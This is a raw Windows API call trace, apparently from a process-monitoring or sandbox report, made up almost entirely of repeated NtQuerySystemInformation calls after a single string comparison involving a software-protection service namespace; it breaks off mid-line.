[0280.623] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0280.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0280.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.624] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0280.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0280.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0280.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0280.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd60, Length=0x28, ResultLength=0x0) [0280.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0280.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0280.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0280.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0280.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0280.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0280.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x50, ResultLength=0x0) [0280.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x50, ResultLength=0x0) [0280.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x50, ResultLength=0x0) [0280.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x50, ResultLength=0x0) [0280.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x50, ResultLength=0x0) [0280.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x50, ResultLength=0x0) [0280.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x50, ResultLength=0x0) [0280.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x38, ResultLength=0x0) [0280.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x28, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x28, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x28, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x28, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x28, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x38, ResultLength=0x0) [0280.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0280.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0280.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7a0, Length=0x20, ResultLength=0x0) [0280.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0280.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0280.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0280.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x38, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x38, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7f0, Length=0x20, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0280.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0280.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0280.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0280.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0280.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0280.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0280.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0280.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0280.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0280.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0280.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0280.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0280.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0280.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0280.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0280.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0280.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0280.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0280.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0280.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0280.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0280.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0280.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0280.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0280.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0280.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0280.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0280.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0280.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0280.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0280.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0280.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0280.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0280.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0280.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0280.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0280.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0280.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0280.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0280.665] NtQuerySystemInformation (SystemInformationClass=0xb9, 